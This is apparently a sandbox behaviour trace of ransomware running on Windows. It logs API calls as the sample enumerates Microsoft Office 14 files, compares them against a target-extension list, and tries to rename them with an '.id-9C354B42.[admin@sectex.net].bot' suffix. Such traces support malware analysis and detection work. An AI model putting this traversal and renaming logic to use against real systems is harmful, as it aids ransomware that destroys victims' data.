	[0149.263] lstrlenW (lpString=".1cd") returned 4
	[0149.263] lstrcmpiW (lpString1=".1cd", lpString2=".VSL") returned -1
	[0149.263] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\Office14\\1033\\ORGWIZ.VSL") returned 58
	[0149.263] lstrlenW (lpString=".jpg") returned 4
	[0149.263] lstrcmpiW (lpString1=".jpg", lpString2=".VSL") returned -1
	[0149.263] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\Office14\\1033\\ORGWIZ.VSL") returned 58
	[0149.263] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\Office14\\1033\\ORGWIZ.VSL") returned 58
	[0149.263] lstrlenW (lpString=".doc") returned 4
	[0149.263] lstrcmpiW (lpString1=".doc", lpString2=".VSL") returned -1
	[0149.263] lstrlenW (lpString=".docx") returned 5
	[0149.263] lstrcmpiW (lpString1=".docx", lpString2="Z.VSL") returned -1
	[0149.263] lstrlenW (lpString=".pdf") returned 4
	[0149.263] lstrcmpiW (lpString1=".pdf", lpString2=".VSL") returned -1
	[0149.263] lstrlenW (lpString=".xls") returned 4
	[0149.264] lstrcmpiW (lpString1=".xls", lpString2=".VSL") returned 1
	[0149.264] lstrlenW (lpString=".xlsx") returned 5
	[0149.264] lstrcmpiW (lpString1=".xlsx", lpString2="Z.VSL") returned -1
	[0149.264] lstrlenW (lpString=".ppt") returned 4
	[0149.264] lstrcmpiW (lpString1=".ppt", lpString2=".VSL") returned -1
	[0149.264] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\Office14\\1033\\ORGWIZ.VSL") returned 58
	[0149.264] lstrlenW (lpString=".zip") returned 4
	[0149.264] lstrcmpiW (lpString1=".zip", lpString2=".VSL") returned 1
	[0149.264] lstrlenW (lpString=".rar") returned 4
	[0149.264] lstrcmpiW (lpString1=".rar", lpString2=".VSL") returned -1
	[0149.264] lstrlenW (lpString=".bz2") returned 4
	[0149.264] lstrcmpiW (lpString1=".bz2", lpString2=".VSL") returned -1
	[0149.264] lstrlenW (lpString=".7z") returned 3
	[0149.264] lstrcmpiW (lpString1=".7z", lpString2="VSL") returned -1
	[0149.264] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\Office14\\1033\\ORGWIZ.VSL") returned 58
	[0149.264] lstrlenW (lpString=".dbf") returned 4
	[0149.264] lstrcmpiW (lpString1=".dbf", lpString2=".VSL") returned -1
	[0149.264] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\Office14\\1033\\ORGWIZ.VSL") returned 58
	[0149.264] lstrlenW (lpString=".1cd") returned 4
	[0149.264] lstrcmpiW (lpString1=".1cd", lpString2=".VSL") returned -1
	[0149.264] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\Office14\\1033\\ORGWIZ.VSL") returned 58
	[0149.264] lstrlenW (lpString=".jpg") returned 4
	[0149.264] lstrcmpiW (lpString1=".jpg", lpString2=".VSL") returned -1
	[0149.264] lstrcmpiW (lpString1=".dll", lpString2=".bot") returned 1
	[0149.264] lstrlenW (lpString="ospintl.dll") returned 11
	[0149.264] CreateFileW (lpFileName="C:\\Program Files\\Microsoft Office\\Office14\\1033\\ospintl.dll" (normalized: "c:\\program files\\microsoft office\\office14\\1033\\ospintl.dll"), dwDesiredAccess=0x80000000, dwShareMode=0x3, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0x3ac
	[0149.265] GetFileSizeEx (in: hFile=0x3ac, lpFileSize=0xaacff1c | out: lpFileSize=0xaacff1c*=18320) returned 1
	[0149.265] CloseHandle (hObject=0x3ac) returned 1
	[0149.265] GetFileAttributesW (lpFileName="C:\\Program Files\\Microsoft Office\\Office14\\1033\\ospintl.dll" (normalized: "c:\\program files\\microsoft office\\office14\\1033\\ospintl.dll")) returned 0x20
	[0149.265] GetFileAttributesW (lpFileName="C:\\Program Files\\Microsoft Office\\Office14\\1033\\ospintl.dll.id-9C354B42.[admin@sectex.net].bot" (normalized: "c:\\program files\\microsoft office\\office14\\1033\\ospintl.dll.id-9c354b42.[admin@sectex.net].bot")) returned 0xffffffff
	[0149.265] CreateFileW (lpFileName="C:\\Program Files\\Microsoft Office\\Office14\\1033\\ospintl.dll" (normalized: "c:\\program files\\microsoft office\\office14\\1033\\ospintl.dll"), dwDesiredAccess=0xc0000000, dwShareMode=0x3, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0xffffffff
	[0149.265] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\Office14\\1033\\ospintl.dll") returned 59
	[0149.265] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\Office14\\1033\\ospintl.dll") returned 59
	[0149.265] lstrlenW (lpString=".doc") returned 4
	[0149.265] lstrcmpiW (lpString1=".doc", lpString2=".dll") returned 1
	[0149.265] lstrlenW (lpString=".docx") returned 5
	[0149.266] lstrcmpiW (lpString1=".docx", lpString2="l.dll") returned -1
	[0149.266] lstrlenW (lpString=".pdf") returned 4
	[0149.266] lstrcmpiW (lpString1=".pdf", lpString2=".dll") returned 1
	[0149.266] lstrlenW (lpString=".xls") returned 4
	[0149.266] lstrcmpiW (lpString1=".xls", lpString2=".dll") returned 1
	[0149.266] lstrlenW (lpString=".xlsx") returned 5
	[0149.266] lstrcmpiW (lpString1=".xlsx", lpString2="l.dll") returned -1
	[0149.266] lstrlenW (lpString=".ppt") returned 4
	[0149.266] lstrcmpiW (lpString1=".ppt", lpString2=".dll") returned 1
	[0149.266] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\Office14\\1033\\ospintl.dll") returned 59
	[0149.266] lstrlenW (lpString=".zip") returned 4
	[0149.266] lstrcmpiW (lpString1=".zip", lpString2=".dll") returned 1
	[0149.266] lstrlenW (lpString=".rar") returned 4
	[0149.266] lstrcmpiW (lpString1=".rar", lpString2=".dll") returned 1
	[0149.266] lstrlenW (lpString=".bz2") returned 4
	[0149.266] lstrcmpiW (lpString1=".bz2", lpString2=".dll") returned -1
	[0149.266] lstrlenW (lpString=".7z") returned 3
	[0149.266] lstrcmpiW (lpString1=".7z", lpString2="dll") returned -1
	[0149.266] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\Office14\\1033\\ospintl.dll") returned 59
	[0149.266] lstrlenW (lpString=".dbf") returned 4
	[0149.266] lstrcmpiW (lpString1=".dbf", lpString2=".dll") returned -1
	[0149.266] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\Office14\\1033\\ospintl.dll") returned 59
	[0149.266] lstrlenW (lpString=".1cd") returned 4
	[0149.266] lstrcmpiW (lpString1=".1cd", lpString2=".dll") returned -1
	[0149.266] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\Office14\\1033\\ospintl.dll") returned 59
	[0149.266] lstrlenW (lpString=".jpg") returned 4
	[0149.266] lstrcmpiW (lpString1=".jpg", lpString2=".dll") returned 1
	[0149.266] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\Office14\\1033\\ospintl.dll") returned 59
	[0149.266] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\Office14\\1033\\ospintl.dll") returned 59
	[0149.266] lstrlenW (lpString=".doc") returned 4
	[0149.267] lstrcmpiW (lpString1=".doc", lpString2=".dll") returned 1
	[0149.267] lstrlenW (lpString=".docx") returned 5
	[0149.267] lstrcmpiW (lpString1=".docx", lpString2="l.dll") returned -1
	[0149.267] lstrlenW (lpString=".pdf") returned 4
	[0149.267] lstrcmpiW (lpString1=".pdf", lpString2=".dll") returned 1
	[0149.267] lstrlenW (lpString=".xls") returned 4
	[0149.267] lstrcmpiW (lpString1=".xls", lpString2=".dll") returned 1
	[0149.267] lstrlenW (lpString=".xlsx") returned 5
	[0149.267] lstrcmpiW (lpString1=".xlsx", lpString2="l.dll") returned -1
	[0149.267] lstrlenW (lpString=".ppt") returned 4
	[0149.267] lstrcmpiW (lpString1=".ppt", lpString2=".dll") returned 1
	[0149.267] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\Office14\\1033\\ospintl.dll") returned 59
	[0149.267] lstrlenW (lpString=".zip") returned 4
	[0149.267] lstrcmpiW (lpString1=".zip", lpString2=".dll") returned 1
	[0149.267] lstrlenW (lpString=".rar") returned 4
	[0149.267] lstrcmpiW (lpString1=".rar", lpString2=".dll") returned 1
	[0149.267] lstrlenW (lpString=".bz2") returned 4
	[0149.267] lstrcmpiW (lpString1=".bz2", lpString2=".dll") returned -1
	[0149.267] lstrlenW (lpString=".7z") returned 3
	[0149.267] lstrcmpiW (lpString1=".7z", lpString2="dll") returned -1
	[0149.267] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\Office14\\1033\\ospintl.dll") returned 59
	[0149.267] lstrlenW (lpString=".dbf") returned 4
	[0149.267] lstrcmpiW (lpString1=".dbf", lpString2=".dll") returned -1
	[0149.267] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\Office14\\1033\\ospintl.dll") returned 59
	[0149.267] lstrlenW (lpString=".1cd") returned 4
	[0149.267] lstrcmpiW (lpString1=".1cd", lpString2=".dll") returned -1
	[0149.267] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\Office14\\1033\\ospintl.dll") returned 59
	[0149.267] lstrlenW (lpString=".jpg") returned 4
	[0149.267] lstrcmpiW (lpString1=".jpg", lpString2=".dll") returned 1
	[0149.268] lstrcmpiW (lpString1=".INF", lpString2=".bot") returned 1
	[0149.268] lstrlenW (lpString="OUTLBAR.INF") returned 11
	[0149.268] CreateFileW (lpFileName="C:\\Program Files\\Microsoft Office\\Office14\\1033\\OUTLBAR.INF" (normalized: "c:\\program files\\microsoft office\\office14\\1033\\outlbar.inf"), dwDesiredAccess=0x80000000, dwShareMode=0x3, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0x3ac
	[0149.279] GetFileSizeEx (in: hFile=0x3ac, lpFileSize=0xaacff1c | out: lpFileSize=0xaacff1c*=2416) returned 1
	[0149.279] CloseHandle (hObject=0x3ac) returned 1
	[0149.279] GetFileAttributesW (lpFileName="C:\\Program Files\\Microsoft Office\\Office14\\1033\\OUTLBAR.INF" (normalized: "c:\\program files\\microsoft office\\office14\\1033\\outlbar.inf")) returned 0x20
	[0149.279] GetFileAttributesW (lpFileName="C:\\Program Files\\Microsoft Office\\Office14\\1033\\OUTLBAR.INF.id-9C354B42.[admin@sectex.net].bot" (normalized: "c:\\program files\\microsoft office\\office14\\1033\\outlbar.inf.id-9c354b42.[admin@sectex.net].bot")) returned 0xffffffff
	[0149.279] CreateFileW (lpFileName="C:\\Program Files\\Microsoft Office\\Office14\\1033\\OUTLBAR.INF" (normalized: "c:\\program files\\microsoft office\\office14\\1033\\outlbar.inf"), dwDesiredAccess=0xc0000000, dwShareMode=0x3, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0xffffffff
	[0149.279] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\Office14\\1033\\OUTLBAR.INF") returned 59
	[0149.279] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\Office14\\1033\\OUTLBAR.INF") returned 59
	[0149.279] lstrlenW (lpString=".doc") returned 4
	[0149.279] lstrcmpiW (lpString1=".doc", lpString2=".INF") returned -1
	[0149.279] lstrlenW (lpString=".docx") returned 5
	[0149.280] lstrcmpiW (lpString1=".docx", lpString2="R.INF") returned -1
	[0149.280] lstrlenW (lpString=".pdf") returned 4
	[0149.280] lstrcmpiW (lpString1=".pdf", lpString2=".INF") returned 1
	[0149.280] lstrlenW (lpString=".xls") returned 4
	[0149.280] lstrcmpiW (lpString1=".xls", lpString2=".INF") returned 1
	[0149.280] lstrlenW (lpString=".xlsx") returned 5
	[0149.280] lstrcmpiW (lpString1=".xlsx", lpString2="R.INF") returned -1
	[0149.280] lstrlenW (lpString=".ppt") returned 4
	[0149.280] lstrcmpiW (lpString1=".ppt", lpString2=".INF") returned 1
	[0149.280] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\Office14\\1033\\OUTLBAR.INF") returned 59
	[0149.280] lstrlenW (lpString=".zip") returned 4
	[0149.280] lstrcmpiW (lpString1=".zip", lpString2=".INF") returned 1
	[0149.280] lstrlenW (lpString=".rar") returned 4
	[0149.280] lstrcmpiW (lpString1=".rar", lpString2=".INF") returned 1
	[0149.280] lstrlenW (lpString=".bz2") returned 4
	[0149.280] lstrcmpiW (lpString1=".bz2", lpString2=".INF") returned -1
	[0149.280] lstrlenW (lpString=".7z") returned 3
	[0149.280] lstrcmpiW (lpString1=".7z", lpString2="INF") returned -1
	[0149.280] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\Office14\\1033\\OUTLBAR.INF") returned 59
	[0149.280] lstrlenW (lpString=".dbf") returned 4
	[0149.280] lstrcmpiW (lpString1=".dbf", lpString2=".INF") returned -1
	[0149.280] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\Office14\\1033\\OUTLBAR.INF") returned 59
	[0149.280] lstrlenW (lpString=".1cd") returned 4
	[0149.280] lstrcmpiW (lpString1=".1cd", lpString2=".INF") returned -1
	[0149.280] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\Office14\\1033\\OUTLBAR.INF") returned 59
	[0149.280] lstrlenW (lpString=".jpg") returned 4
	[0149.280] lstrcmpiW (lpString1=".jpg", lpString2=".INF") returned 1
	[0149.280] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\Office14\\1033\\OUTLBAR.INF") returned 59
	[0149.280] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\Office14\\1033\\OUTLBAR.INF") returned 59
	[0149.280] lstrlenW (lpString=".doc") returned 4
	[0149.280] lstrcmpiW (lpString1=".doc", lpString2=".INF") returned -1
	[0149.281] lstrlenW (lpString=".docx") returned 5
	[0149.281] lstrcmpiW (lpString1=".docx", lpString2="R.INF") returned -1
	[0149.281] lstrlenW (lpString=".pdf") returned 4
	[0149.281] lstrcmpiW (lpString1=".pdf", lpString2=".INF") returned 1
	[0149.281] lstrlenW (lpString=".xls") returned 4
	[0149.281] lstrcmpiW (lpString1=".xls", lpString2=".INF") returned 1
	[0149.281] lstrlenW (lpString=".xlsx") returned 5
	[0149.281] lstrcmpiW (lpString1=".xlsx", lpString2="R.INF") returned -1
	[0149.281] lstrlenW (lpString=".ppt") returned 4
	[0149.281] lstrcmpiW (lpString1=".ppt", lpString2=".INF") returned 1
	[0149.281] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\Office14\\1033\\OUTLBAR.INF") returned 59
	[0149.281] lstrlenW (lpString=".zip") returned 4
	[0149.281] lstrcmpiW (lpString1=".zip", lpString2=".INF") returned 1
	[0149.281] lstrlenW (lpString=".rar") returned 4
	[0149.281] lstrcmpiW (lpString1=".rar", lpString2=".INF") returned 1
	[0149.281] lstrlenW (lpString=".bz2") returned 4
	[0149.281] lstrcmpiW (lpString1=".bz2", lpString2=".INF") returned -1
	[0149.281] lstrlenW (lpString=".7z") returned 3
	[0149.281] lstrcmpiW (lpString1=".7z", lpString2="INF") returned -1
	[0149.281] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\Office14\\1033\\OUTLBAR.INF") returned 59
	[0149.281] lstrlenW (lpString=".dbf") returned 4
	[0149.281] lstrcmpiW (lpString1=".dbf", lpString2=".INF") returned -1
	[0149.281] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\Office14\\1033\\OUTLBAR.INF") returned 59
	[0149.281] lstrlenW (lpString=".1cd") returned 4
	[0149.281] lstrcmpiW (lpString1=".1cd", lpString2=".INF") returned -1
	[0149.281] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\Office14\\1033\\OUTLBAR.INF") returned 59
	[0149.281] lstrlenW (lpString=".jpg") returned 4
	[0149.281] lstrcmpiW (lpString1=".jpg", lpString2=".INF") returned 1
	[0149.282] lstrcmpiW (lpString1=".DLL", lpString2=".bot") returned 1
	[0149.282] lstrlenW (lpString="OUTLLIBR.DLL") returned 12
	[0149.282] CreateFileW (lpFileName="C:\\Program Files\\Microsoft Office\\Office14\\1033\\OUTLLIBR.DLL" (normalized: "c:\\program files\\microsoft office\\office14\\1033\\outllibr.dll"), dwDesiredAccess=0x80000000, dwShareMode=0x3, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0x3ac
	[0149.282] GetFileSizeEx (in: hFile=0x3ac, lpFileSize=0xaacff1c | out: lpFileSize=0xaacff1c*=6573424) returned 1
	[0149.282] CloseHandle (hObject=0x3ac) returned 1
	[0149.282] GetFileAttributesW (lpFileName="C:\\Program Files\\Microsoft Office\\Office14\\1033\\OUTLLIBR.DLL" (normalized: "c:\\program files\\microsoft office\\office14\\1033\\outllibr.dll")) returned 0x20
	[0149.282] GetFileAttributesW (lpFileName="C:\\Program Files\\Microsoft Office\\Office14\\1033\\OUTLLIBR.DLL.id-9C354B42.[admin@sectex.net].bot" (normalized: "c:\\program files\\microsoft office\\office14\\1033\\outllibr.dll.id-9c354b42.[admin@sectex.net].bot")) returned 0xffffffff
	[0149.282] MoveFileW (lpExistingFileName="C:\\Program Files\\Microsoft Office\\Office14\\1033\\OUTLLIBR.DLL" (normalized: "c:\\program files\\microsoft office\\office14\\1033\\outllibr.dll"), lpNewFileName="C:\\Program Files\\Microsoft Office\\Office14\\1033\\OUTLLIBR.DLL.id-9C354B42.[admin@sectex.net].bot" (normalized: "c:\\program files\\microsoft office\\office14\\1033\\outllibr.dll.id-9c354b42.[admin@sectex.net].bot")) returned 0
	[0149.283] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\Office14\\1033\\OUTLLIBR.DLL") returned 60
	[0149.283] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\Office14\\1033\\OUTLLIBR.DLL") returned 60
	[0149.283] lstrlenW (lpString=".doc") returned 4
	[0149.283] lstrcmpiW (lpString1=".doc", lpString2=".DLL") returned 1
	[0149.283] lstrlenW (lpString=".docx") returned 5
	[0149.283] lstrcmpiW (lpString1=".docx", lpString2="R.DLL") returned -1
	[0149.283] lstrlenW (lpString=".pdf") returned 4
	[0149.283] lstrcmpiW (lpString1=".pdf", lpString2=".DLL") returned 1
	[0149.283] lstrlenW (lpString=".xls") returned 4
	[0149.283] lstrcmpiW (lpString1=".xls", lpString2=".DLL") returned 1
	[0149.283] lstrlenW (lpString=".xlsx") returned 5
	[0149.283] lstrcmpiW (lpString1=".xlsx", lpString2="R.DLL") returned -1
	[0149.283] lstrlenW (lpString=".ppt") returned 4
	[0149.283] lstrcmpiW (lpString1=".ppt", lpString2=".DLL") returned 1
	[0149.283] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\Office14\\1033\\OUTLLIBR.DLL") returned 60
	[0149.283] lstrlenW (lpString=".zip") returned 4
	[0149.283] lstrcmpiW (lpString1=".zip", lpString2=".DLL") returned 1
	[0149.283] lstrlenW (lpString=".rar") returned 4
	[0149.283] lstrcmpiW (lpString1=".rar", lpString2=".DLL") returned 1
	[0149.283] lstrlenW (lpString=".bz2") returned 4
	[0149.283] lstrcmpiW (lpString1=".bz2", lpString2=".DLL") returned -1
	[0149.283] lstrlenW (lpString=".7z") returned 3
	[0149.283] lstrcmpiW (lpString1=".7z", lpString2="DLL") returned -1
	[0149.283] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\Office14\\1033\\OUTLLIBR.DLL") returned 60
	[0149.283] lstrlenW (lpString=".dbf") returned 4
	[0149.283] lstrcmpiW (lpString1=".dbf", lpString2=".DLL") returned -1
	[0149.461] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\Office14\\1033\\OUTLLIBR.DLL") returned 60
	[0149.461] lstrlenW (lpString=".1cd") returned 4
	[0149.461] lstrcmpiW (lpString1=".1cd", lpString2=".DLL") returned -1
	[0149.461] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\Office14\\1033\\OUTLLIBR.DLL") returned 60
	[0149.461] lstrlenW (lpString=".jpg") returned 4
	[0149.461] lstrcmpiW (lpString1=".jpg", lpString2=".DLL") returned 1
	[0149.461] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\Office14\\1033\\OUTLLIBR.DLL") returned 60
	[0149.461] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\Office14\\1033\\OUTLLIBR.DLL") returned 60
	[0149.461] lstrlenW (lpString=".doc") returned 4
	[0149.462] lstrcmpiW (lpString1=".doc", lpString2=".DLL") returned 1
	[0149.462] lstrlenW (lpString=".docx") returned 5
	[0149.462] lstrcmpiW (lpString1=".docx", lpString2="R.DLL") returned -1
	[0149.462] lstrlenW (lpString=".pdf") returned 4
	[0149.462] lstrcmpiW (lpString1=".pdf", lpString2=".DLL") returned 1
	[0149.462] lstrlenW (lpString=".xls") returned 4
	[0149.462] lstrcmpiW (lpString1=".xls", lpString2=".DLL") returned 1
	[0149.462] lstrlenW (lpString=".xlsx") returned 5
	[0149.462] lstrcmpiW (lpString1=".xlsx", lpString2="R.DLL") returned -1
	[0149.462] lstrlenW (lpString=".ppt") returned 4
	[0149.462] lstrcmpiW (lpString1=".ppt", lpString2=".DLL") returned 1
	[0149.462] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\Office14\\1033\\OUTLLIBR.DLL") returned 60
	[0149.462] lstrlenW (lpString=".zip") returned 4
	[0149.462] lstrcmpiW (lpString1=".zip", lpString2=".DLL") returned 1
	[0149.462] lstrlenW (lpString=".rar") returned 4
	[0149.462] lstrcmpiW (lpString1=".rar", lpString2=".DLL") returned 1
	[0149.462] lstrlenW (lpString=".bz2") returned 4
	[0149.462] lstrcmpiW (lpString1=".bz2", lpString2=".DLL") returned -1
	[0149.462] lstrlenW (lpString=".7z") returned 3
	[0149.462] lstrcmpiW (lpString1=".7z", lpString2="DLL") returned -1
	[0149.462] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\Office14\\1033\\OUTLLIBR.DLL") returned 60
	[0149.462] lstrlenW (lpString=".dbf") returned 4
	[0149.462] lstrcmpiW (lpString1=".dbf", lpString2=".DLL") returned -1
	[0149.462] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\Office14\\1033\\OUTLLIBR.DLL") returned 60
	[0149.462] lstrlenW (lpString=".1cd") returned 4
	[0149.462] lstrcmpiW (lpString1=".1cd", lpString2=".DLL") returned -1
	[0149.462] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\Office14\\1033\\OUTLLIBR.DLL") returned 60
	[0149.462] lstrlenW (lpString=".jpg") returned 4
	[0149.462] lstrcmpiW (lpString1=".jpg", lpString2=".DLL") returned 1
	[0149.463] lstrcmpiW (lpString1=".HXS", lpString2=".bot") returned 1
	[0149.463] lstrlenW (lpString="OUTLOOK.DEV.HXS") returned 15
	[0149.463] CreateFileW (lpFileName="C:\\Program Files\\Microsoft Office\\Office14\\1033\\OUTLOOK.DEV.HXS" (normalized: "c:\\program files\\microsoft office\\office14\\1033\\outlook.dev.hxs"), dwDesiredAccess=0x80000000, dwShareMode=0x3, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0x3dc
	[0149.474] GetFileSizeEx (in: hFile=0x3dc, lpFileSize=0xaacff1c | out: lpFileSize=0xaacff1c*=6988760) returned 1
	[0149.474] CloseHandle (hObject=0x3dc) returned 1
	[0149.474] GetFileAttributesW (lpFileName="C:\\Program Files\\Microsoft Office\\Office14\\1033\\OUTLOOK.DEV.HXS" (normalized: "c:\\program files\\microsoft office\\office14\\1033\\outlook.dev.hxs")) returned 0x20
	[0149.474] GetFileAttributesW (lpFileName="C:\\Program Files\\Microsoft Office\\Office14\\1033\\OUTLOOK.DEV.HXS.id-9C354B42.[admin@sectex.net].bot" (normalized: "c:\\program files\\microsoft office\\office14\\1033\\outlook.dev.hxs.id-9c354b42.[admin@sectex.net].bot")) returned 0xffffffff
	[0149.475] MoveFileW (lpExistingFileName="C:\\Program Files\\Microsoft Office\\Office14\\1033\\OUTLOOK.DEV.HXS" (normalized: "c:\\program files\\microsoft office\\office14\\1033\\outlook.dev.hxs"), lpNewFileName="C:\\Program Files\\Microsoft Office\\Office14\\1033\\OUTLOOK.DEV.HXS.id-9C354B42.[admin@sectex.net].bot" (normalized: "c:\\program files\\microsoft office\\office14\\1033\\outlook.dev.hxs.id-9c354b42.[admin@sectex.net].bot")) returned 0
	[0149.475] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\Office14\\1033\\OUTLOOK.DEV.HXS") returned 63
	[0149.475] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\Office14\\1033\\OUTLOOK.DEV.HXS") returned 63
	[0149.475] lstrlenW (lpString=".doc") returned 4
	[0149.475] lstrcmpiW (lpString1=".doc", lpString2=".HXS") returned -1
	[0149.475] lstrlenW (lpString=".docx") returned 5
	[0149.475] lstrcmpiW (lpString1=".docx", lpString2="V.HXS") returned -1
	[0149.475] lstrlenW (lpString=".pdf") returned 4
	[0149.475] lstrcmpiW (lpString1=".pdf", lpString2=".HXS") returned 1
	[0149.475] lstrlenW (lpString=".xls") returned 4
	[0149.475] lstrcmpiW (lpString1=".xls", lpString2=".HXS") returned 1
	[0149.475] lstrlenW (lpString=".xlsx") returned 5
	[0149.475] lstrcmpiW (lpString1=".xlsx", lpString2="V.HXS") returned -1
	[0149.475] lstrlenW (lpString=".ppt") returned 4
	[0149.475] lstrcmpiW (lpString1=".ppt", lpString2=".HXS") returned 1
	[0149.475] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\Office14\\1033\\OUTLOOK.DEV.HXS") returned 63
	[0149.475] lstrlenW (lpString=".zip") returned 4
	[0149.475] lstrcmpiW (lpString1=".zip", lpString2=".HXS") returned 1
	[0149.475] lstrlenW (lpString=".rar") returned 4
	[0149.475] lstrcmpiW (lpString1=".rar", lpString2=".HXS") returned 1
	[0149.475] lstrlenW (lpString=".bz2") returned 4
	[0149.475] lstrcmpiW (lpString1=".bz2", lpString2=".HXS") returned -1
	[0149.475] lstrlenW (lpString=".7z") returned 3
	[0149.475] lstrcmpiW (lpString1=".7z", lpString2="HXS") returned -1
	[0149.475] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\Office14\\1033\\OUTLOOK.DEV.HXS") returned 63
	[0149.475] lstrlenW (lpString=".dbf") returned 4
	[0149.475] lstrcmpiW (lpString1=".dbf", lpString2=".HXS") returned -1
	[0149.475] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\Office14\\1033\\OUTLOOK.DEV.HXS") returned 63
	[0149.475] lstrlenW (lpString=".1cd") returned 4
	[0149.476] lstrcmpiW (lpString1=".1cd", lpString2=".HXS") returned -1
	[0149.476] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\Office14\\1033\\OUTLOOK.DEV.HXS") returned 63
	[0149.476] lstrlenW (lpString=".jpg") returned 4
	[0149.476] lstrcmpiW (lpString1=".jpg", lpString2=".HXS") returned 1
	[0149.476] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\Office14\\1033\\OUTLOOK.DEV.HXS") returned 63
	[0149.476] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\Office14\\1033\\OUTLOOK.DEV.HXS") returned 63
	[0149.476] lstrlenW (lpString=".doc") returned 4
	[0149.476] lstrcmpiW (lpString1=".doc", lpString2=".HXS") returned -1
	[0149.476] lstrlenW (lpString=".docx") returned 5
	[0149.476] lstrcmpiW (lpString1=".docx", lpString2="V.HXS") returned -1
	[0149.476] lstrlenW (lpString=".pdf") returned 4
	[0149.476] lstrcmpiW (lpString1=".pdf", lpString2=".HXS") returned 1
	[0149.476] lstrlenW (lpString=".xls") returned 4
	[0149.476] lstrcmpiW (lpString1=".xls", lpString2=".HXS") returned 1
	[0149.476] lstrlenW (lpString=".xlsx") returned 5
	[0149.476] lstrcmpiW (lpString1=".xlsx", lpString2="V.HXS") returned -1
	[0149.476] lstrlenW (lpString=".ppt") returned 4
	[0149.476] lstrcmpiW (lpString1=".ppt", lpString2=".HXS") returned 1
	[0149.476] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\Office14\\1033\\OUTLOOK.DEV.HXS") returned 63
	[0149.476] lstrlenW (lpString=".zip") returned 4
	[0149.476] lstrcmpiW (lpString1=".zip", lpString2=".HXS") returned 1
	[0149.476] lstrlenW (lpString=".rar") returned 4
	[0149.476] lstrcmpiW (lpString1=".rar", lpString2=".HXS") returned 1
	[0149.476] lstrlenW (lpString=".bz2") returned 4
	[0149.476] lstrcmpiW (lpString1=".bz2", lpString2=".HXS") returned -1
	[0149.476] lstrlenW (lpString=".7z") returned 3
	[0149.476] lstrcmpiW (lpString1=".7z", lpString2="HXS") returned -1
	[0149.476] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\Office14\\1033\\OUTLOOK.DEV.HXS") returned 63
	[0149.476] lstrlenW (lpString=".dbf") returned 4
	[0149.476] lstrcmpiW (lpString1=".dbf", lpString2=".HXS") returned -1
	[0149.476] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\Office14\\1033\\OUTLOOK.DEV.HXS") returned 63
	[0149.477] lstrlenW (lpString=".1cd") returned 4
	[0149.477] lstrcmpiW (lpString1=".1cd", lpString2=".HXS") returned -1
	[0149.477] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\Office14\\1033\\OUTLOOK.DEV.HXS") returned 63
	[0149.477] lstrlenW (lpString=".jpg") returned 4
	[0149.477] lstrcmpiW (lpString1=".jpg", lpString2=".HXS") returned 1
	[0149.477] lstrcmpiW (lpString1=".HXT", lpString2=".bot") returned 1
